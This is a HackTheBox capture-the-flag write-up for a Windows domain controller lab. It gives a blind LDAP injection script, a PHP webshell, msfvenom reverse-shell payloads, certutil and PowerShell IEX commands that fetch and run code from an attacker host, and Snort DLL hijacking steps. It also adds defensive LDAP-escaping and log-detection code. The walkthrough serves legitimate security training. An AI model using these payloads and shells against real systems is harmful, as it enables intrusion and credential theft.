HTB: analysis Writeup


Machine Information

Attribute    | Details
-------------|--------------
Name         | analysis
OS           | Windows
Difficulty   | Hard
Points       | N/A
Release Date | N/A
IP Address   | 10.129.51.235
Author       | D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

analysis is a Hard-difficulty Windows machine running as a Domain Controller in an Active Directory environment. The exploitation path involves DNS and web enumeration to discover subdomains, exploiting an LDAP injection vulnerability to extract credentials, uploading a PHP webshell for initial access, credential discovery in configuration files, lateral movement using alternate credentials, and finally privilege escalation through Snort DLL hijacking to achieve system-level access.

TL;DR: Reconnaissance → LDAP Injection → Webshell Access → Credential Extraction → Lateral Movement → DLL Hijacking → SYSTEM.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.51.235

Results:

Port | Service           | Details
-----|-------------------|----------------------------------------
53   | DNS               | Simple DNS Plus
80   | HTTP              | IIS 10.0
88   | Kerberos          | Microsoft Windows Kerberos
135  | MSRPC             | Microsoft Windows RPC
139  | NetBIOS           | Microsoft Windows netbios-ssn
389  | LDAP              | Microsoft Windows Active Directory LDAP
445  | SMB               | Microsoft-ds
464  | Kerberos Password | kpasswd5
593  | RPC over HTTP     | ncacn_http
636  | LDAPS             | LDAP over SSL
3268 | LDAP GC           | Global Catalog
3269 | LDAPS GC          | Global Catalog over SSL
3306 | MySQL             | MySQL (unauthorized)

Service Enumeration

Hostname: analysis.htb

Domain: analysis.htb (Active Directory environment)

Host: DC-ANALYSIS (Domain Controller)

Subdomains Discovered:

  • www.analysis.htb
  • internal.analysis.htb
  • gc._msdcs.analysis.htb
  • domaindnszones.analysis.htb
  • forestdnszones.analysis.htb

echo "10.129.51.235 analysis.htb" >> /etc/hosts

DNS Enumeration with gobuster:

gobuster dns -d analysis.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i

Directory Enumeration on internal.analysis.htb:

gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/wordlists/dirb/common.txt

Initial Foothold

Step 1: User Enumeration with kerbrute

kerbrute userenum --dc 10.129.51.235 -d analysis.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Users Discovered:

Step 2: LDAP Injection Vulnerability

The endpoint /users/list.php on internal.analysis.htb contains a blind LDAP injection vulnerability.

Vulnerable Parameter: the search value is concatenated into the LDAP filter without sanitization, so filter metacharacters in the input change the query structure.

Exploitation Script:

#!/usr/bin/env python3
import requests
import string

target = "http://internal.analysis.htb/users/list.php"
charset = string.ascii_letters + string.digits + "!@#$%^&*()"
# Filter metacharacters are sent in RFC 4515 escaped form: a raw "*" would
# always match, and raw parentheses would break the injected filter.
escapes = {"*": r"\2a", "(": r"\28", ")": r"\29"}

# Baseline: response size for a search term that matches no user
expected_length = len(requests.get(target, params={"search": "zzzzzz"}).text)

def check_char(prefix, char):
    # True when the value recovered so far, extended by one more character, still matches
    guess = "".join(escapes.get(c, c) for c in prefix + char)
    payload = f"*))(&(|(cn=*{guess}*"
    response = requests.get(target, params={"search": payload})
    return "technician" in response.text or len(response.text) > expected_length

# Blind LDAP injection to extract technician password one character at a time
password = ""
for pos in range(20):
    for char in charset:
        if check_char(password, char):
            password += char
            print(f"[+] Found: {password}")
            break
    else:
        break  # no candidate matched: the full value has been recovered

Credentials Extracted:

technician@analysis.htb : 97NTtl*4QP96Bv
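As an added defensive example (not code from the writeup or from list.php itself): the vulnerable filter-building pattern beside its RFC 4515-escaped form, plus a small detector for the same payload shape in IIS W3C log lines. The filter layout assumed for list.php and the log lines are constructed for illustration.

```python
from urllib.parse import parse_qs

# Added example, not code from the writeup or from list.php: the vulnerable
# pattern (raw concatenation into an LDAP filter) next to the RFC 4515-escaped
# form, plus a detector for the same payload shape in IIS W3C log lines.
LDAP_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_value(value: str) -> str:
    """Escape every RFC 4515 metacharacter so user input stays a literal value."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_filter_vulnerable(search: str) -> str:
    """Filter shape assumed for list.php: the search term is concatenated unescaped."""
    return f"(&(objectClass=user)(cn=*{search}*))"

def build_filter_hardened(search: str) -> str:
    """Same filter with the term escaped; the payload can no longer add conditions."""
    return f"(&(objectClass=user)(cn=*{escape_filter_value(search)}*))"

# Constructed IIS W3C log lines (not from the box); the third carries the
# writeup's injection payload with '&' URL-encoded as %26, as a browser sends it.
IIS_LOG_SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2026-03-08 10:01:02 GET /users/list.php search=jdoe 200
2026-03-08 10:01:09 GET /users/list.php search=*))(%26(|(cn=*9* 200
2026-03-08 10:01:15 GET /users/list.php search=technician 200
"""

def flag_injection_attempts(log_text: str) -> list:
    """Return (time, decoded search value) for requests whose search term contains
    filter-structure characters. A bare '*' is not flagged: the app itself wildcards."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6 or fields[3] != "/users/list.php":
            continue
        for value in parse_qs(fields[4], keep_blank_values=True).get("search", []):
            if any(ch in value for ch in "()\\\x00"):
                hits.append((fields[1], value))
    return hits

if __name__ == "__main__":
    payload = "*))(&(|(cn=*9*"
    print(build_filter_vulnerable(payload))  # structure changed by the payload
    print(build_filter_hardened(payload))    # payload reduced to a literal
    print(flag_injection_attempts(IIS_LOG_SAMPLE))
```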

Step 3: Dashboard Access

Navigate to http://internal.analysis.htb/employees/login.php and log in with technician credentials.

curl -X POST http://internal.analysis.htb/employees/login.php \
-d "username=technician&password=97NTtl*4QP96Bv"

The dashboard reveals a “SOC Report” section that allows file uploads.

Step 4: PHP Webshell Upload

Create a malicious PHP file:

<?php
system($_GET['cmd']);
?>

Upload the PHP file through the dashboard upload form. The file is stored in /dashboard/uploads/.

Step 5: Access Webshell

curl "http://internal.analysis.htb/dashboard/uploads/webshell.php?cmd=whoami"

Output: analysis\iis apppool\defaultapppool

Step 6: Establish Reverse Shell

Generate a meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.56 LPORT=4444 -f exe -o exp.exe

Download the payload on the target:

certutil -urlcache -f http://10.10.14.56:8080/exp.exe %temp%\exp.exe

Execute the payload on the target (first command) with the handler listening on the attacking machine (second command) to establish the meterpreter session:

%temp%\exp.exe
msfconsole -r handler.rc

User Compromise

Step 1: Credential Discovery in Configuration Files

Navigate to the web application directory and examine the LDAP binding credentials:

type C:\inetpub\internal\users\list.php

Credentials Found in Source Code:

webservice@analysis.htb : N1G6G46G@G!j

Step 2: Lateral Movement with webservice Account

Use RunasCS to execute commands as the webservice user:

runascs.exe "analysis\webservice" "N1G6G46G@G!j" "powershell.exe -Command IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.56/ps.ps1')"

Step 3: Privilege Escalation Check

Run PrivescCheck to identify further escalation paths:

. .\PrivescCheck.ps1
Invoke-PrivescCheck

Output reveals additional credentials:

jdoe : 7y4Z4^*y9Zzj (Domain: analysis.htb)

Step 4: Access as jdoe

Use evil-winrm to authenticate as jdoe:

evil-winrm -u "jdoe" -i "analysis.htb" -p "7y4Z4^*y9Zzj"

User Flag

type C:\Users\jdoe\Desktop\user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

whoami /priv
net user
systeminfo
Get-Process
tasklist /svc

Vulnerability: Snort DLL Hijacking

Snort is installed on the system with a DLL search order vulnerability:

Get-ChildItem "C:\snort\lib\snort_dynamicpreprocessor"

The Snort service loads DLLs from the C:\snort\lib\snort_dynamicpreprocessor\ directory. If that directory is writable and a malicious DLL can be placed there before Snort loads it, code execution as SYSTEM follows.

Exploitation Steps

1. Generate Malicious DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.56 LPORT=4444 -f dll -o sf_engine.dll

2. Replace Legitimate DLL:

Copy the malicious DLL to the Snort directory:

Copy-Item "C:\temp\sf_engine.dll" "C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll" -Force

3. Wait for Snort to Load the DLL:

Snort runs as a scheduled service or on system startup. Once the service restarts or is triggered, it will load our malicious DLL.

4. Obtain SYSTEM Shell:

Set up a listener and wait for the callback:

msfconsole -r handler.rc

Once Snort loads the malicious DLL, we receive a meterpreter session with SYSTEM privileges.

Root Flag

type C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance<br/>nmap + gobuster DNS"] --> B["User Enumeration<br/>kerbrute"]
B --> C["LDAP Injection Attack<br/>/users/list.php"]
C --> D["Extract technician Credentials<br/>technician:97NTtl*4QP96Bv"]
D --> E["Dashboard Access<br/>internal.analysis.htb/employees/login.php"]
E --> F["PHP Webshell Upload<br/>SOC Report Feature"]
F --> G["Initial Shell Access<br/>webshell.php cmd execution"]
G --> H["Meterpreter Reverse Shell<br/>msfvenom + certutil"]
H --> I["Credential Discovery<br/>webservice:N1G6G46G@G!j from list.php"]
I --> J["Lateral Movement<br/>RunasCS to webservice account"]
J --> K["PrivescCheck Enumeration<br/>Find jdoe credentials"]
K --> L["Access as jdoe<br/>evil-winrm authentication"]
L --> M["Snort DLL Hijacking<br/>Replace sf_engine.dll"]
M --> N["SYSTEM Privilege Escalation<br/>Meterpreter as SYSTEM"]

Tools Used

Tool            | Purpose
----------------|------------------------------------------------
nmap            | Port scanning and service fingerprinting
gobuster        | DNS subdomain and directory enumeration
kerbrute        | Kerberos user enumeration
Python          | LDAP injection exploitation script
curl            | HTTP requests for login and webshell access
msfvenom        | Payload generation (exe and dll)
certutil        | Downloading files from HTTP server
meterpreter     | Reverse shell framework
evil-winrm      | Windows Remote Management shell
RunasCS         | Command execution with alternate credentials
PrivescCheck    | Windows privilege escalation enumeration
nc / msfconsole | Reverse shell listener

Key Learnings

  • Active Directory Enumeration: DNS and subdomain enumeration are critical for discovering hidden web applications in AD environments.
  • LDAP Injection: User input in LDAP queries must be properly sanitized to prevent blind injection attacks that leak credentials.
  • Web Application Vulnerabilities: File upload features without proper validation can directly compromise the system when combined with web server execution.
  • Credential Extraction: Configuration files, source code, and database connections often store plaintext credentials used by service accounts.
  • Lateral Movement: Once you have valid credentials, use tools like RunasCS and evil-winrm to pivot across the domain.
  • DLL Hijacking: Improperly secured application directories with weak file permissions allow DLL replacement attacks for privilege escalation.
  • Privilege Escalation Path: Misconfigurations in installed services (like Snort) can lead to SYSTEM-level code execution through DLL search order hijacking.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Hard